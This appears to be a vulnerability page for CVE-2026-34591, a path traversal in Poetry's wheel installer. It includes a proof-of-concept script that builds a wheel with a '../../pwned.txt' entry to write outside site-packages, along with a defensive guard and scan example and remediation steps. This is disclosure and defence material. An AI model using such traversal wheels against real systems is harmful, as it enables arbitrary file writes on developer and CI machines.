CVE-2026-34591

Severity: HIGH (CVSS 4.0 base score 7.1)
Published: 2026-04-01
Project: https://github.com/python-poetry/poetry
Advisory: GHSA-2599-h6xx-hpxp

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Passive (UI:P)
Scope: not defined (CVSS 4.0 has no Scope metric; the subsequent-system impacts SC/SI/SA are all None in the vector above)

Lifecycle Timeline

Patch Released: Apr 02, 2026 02:30 (nvd), patch available
Analysis Generated: Apr 01, 2026 23:16 (vuln.today)
CVE Published: Apr 01, 2026 22:17 (nvd)

Description

### Summary

A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process.

### Impact

Arbitrary file write (path traversal) from untrusted wheel content. Impacts users and CI/CD systems installing malicious or compromised packages.

### Patches

Versions 2.3.3 and newer of Poetry resolve the target paths and ensure that they are inside the target directory. Otherwise, installation is aborted.

### Details

Poetry's wheel destination path is built by directly joining an untrusted wheel entry path:

- src/poetry/installation/wheel_installer.py:47
- src/poetry/installation/wheel_installer.py:59

The vulnerable sink is reachable in normal installation: src/poetry/installation/executor.py:607

No resolve() + is_relative_to() style guard is enforced before writing.

### POC

```
from pathlib import Path
import tempfile, zipfile, sys
from installer import install
from installer.sources import WheelFile
from poetry.installation.wheel_installer import WheelDestination

# Scratch tree standing in for a virtualenv's scheme directories
root = Path(tempfile.mkdtemp(prefix="poetry-poc-"))
wheel = root / "evil-0.1-py3-none-any.whl"
base = root / "venv" / "lib" / "pythonX" / "site-packages"
for d in [base, root/"venv/scripts", root/"venv/headers", root/"venv/data"]:
    d.mkdir(parents=True, exist_ok=True)

# Minimal wheel whose second entry climbs out of site-packages
files = {
    "evil/__init__.py": b"",
    "../../pwned.txt": b"owned\n",
    "evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
    "evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n",
}
files["evil-0.1.dist-info/RECORD"] = ("\n".join([f"{k},," for k in files] + ["evil-0.1.dist-info/RECORD,,"])+"\n").encode()
with zipfile.ZipFile(wheel, "w") as z:
    for k,v in files.items():
        z.writestr(k,v)

# Poetry's destination object, fed the unguarded entry path by installer.install()
dest = WheelDestination(
    {"purelib":str(base),"platlib":str(base),"scripts":str(root/"venv/scripts"),"headers":str(root/"venv/headers"),"data":str(root/"venv/data")},
    interpreter=sys.executable,
    script_kind="posix"
)
with WheelFile.open(wheel) as src:
    install(src, dest, {"INSTALLER": b"PoC"})
out = (base / "../../pwned.txt").resolve()
print("outside write:", out.exists(), out)
```
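The join described under Details, as an added example that is not Poetry's code and not part of the advisory: `unsafe_destination` reproduces the unguarded join, `safe_destination` is the resolve() + is_relative_to() guard the advisory says was missing, and `suspicious_entries`/`scan_wheel` are a pre-install check over a wheel's entry names that a CI job can run before handing the file to any installer. All function names are my own, and the wheel the demo scans is constructed inline with the same shape as the advisory's PoC.

```python
# Added example (not Poetry's code, not from the advisory): the unguarded join
# the advisory describes, a contained version of it, and a pre-install scan
# that flags traversal entries in a wheel before anything is written.
from pathlib import Path, PurePosixPath
import tempfile
import zipfile


def unsafe_destination(scheme_dir: Path, entry: str) -> Path:
    """Mirror of the flaw: the archive's entry name is joined as-is, so
    '../' climbs out and an absolute entry replaces scheme_dir outright."""
    return scheme_dir / entry


def safe_destination(scheme_dir: Path, entry: str) -> Path:
    """Contained join: resolve both sides and require the target to stay
    under the scheme directory. Raises ValueError on escape.
    Path.is_relative_to needs Python 3.9+."""
    root = scheme_dir.resolve()
    target = (root / entry).resolve()
    if not target.is_relative_to(root):
        raise ValueError(f"wheel entry escapes {root}: {entry!r}")
    return target


def suspicious_entries(names):
    """Return the archive names that could escape a scheme directory:
    absolute paths, any '..' component, or a backslash (a separator on
    Windows, so 'a\\..\\b' must be treated like 'a/../b')."""
    bad = []
    for name in names:
        posix = PurePosixPath(name)
        if posix.is_absolute() or ".." in posix.parts or "\\" in name:
            bad.append(name)
    return bad


def scan_wheel(wheel_path: Path):
    """Pre-install check over a wheel on disk; an empty list means clean."""
    with zipfile.ZipFile(wheel_path) as z:
        return suspicious_entries(z.namelist())


def build_poc_wheel(directory: Path) -> Path:
    """Constructed sample: a minimal wheel with one traversal entry.
    The package name and contents are made up for this demo."""
    wheel = directory / "evil-0.1-py3-none-any.whl"
    files = {
        "evil/__init__.py": b"",
        "../../pwned.txt": b"owned\n",
        "evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
        "evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n",
    }
    record = "\n".join(f"{k},," for k in files) + "\nevil-0.1.dist-info/RECORD,,\n"
    files["evil-0.1.dist-info/RECORD"] = record.encode()
    with zipfile.ZipFile(wheel, "w") as z:
        for name, data in files.items():
            z.writestr(name, data)
    return wheel


def demo():
    """Build the sample wheel, scan it, then show both joins on each entry.
    Returns the list of flagged entry names."""
    root = Path(tempfile.mkdtemp(prefix="wheel-guard-")).resolve()
    site = root / "venv" / "lib" / "python3" / "site-packages"
    site.mkdir(parents=True)
    wheel = build_poc_wheel(root)
    flagged = scan_wheel(wheel)
    print("flagged before install:", flagged)
    for entry in ("evil/__init__.py", "../../pwned.txt"):
        print("unsafe join ->", unsafe_destination(site, entry).resolve())
        try:
            print("safe join   ->", safe_destination(site, entry))
        except ValueError as exc:
            print("safe join   -> rejected:", exc)
    return flagged


if __name__ == "__main__":
    demo()
```

The name scan is a cheap gate, not a replacement for the join-time guard: it rejects a wheel before extraction starts, while `safe_destination` is what actually keeps a write inside the scheme directory regardless of how the entry name was spelled.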

Analysis

Path traversal in Poetry's wheel installer (versions prior to 2.3.3) allows a malicious Python package to write files outside the installation directory during installation. An attacker crafts a wheel whose entry names contain ../ sequences; Poetry joins those names to the destination directory without any containment check, so the write lands wherever the traversal points, with the privileges of the Poetry process, and can create or overwrite arbitrary files. …

Remediation

Within 24 hours: Inventory all Poetry installations across development and CI/CD environments; document current versions and deployment locations. Within 7 days: Upgrade Poetry to version 2.3.3 or later on all systems; if the upgrade is blocked, implement compensating controls below. …

Priority Score

36 (scale: Low / Medium / High / Critical)
Contributions: KEV 0, EPSS +0.1, CVSS +36, POC 0 (the site's PoC signal is 0 even though the advisory text above includes a proof of concept)


CVE-2026-34591 vulnerability details – vuln.today
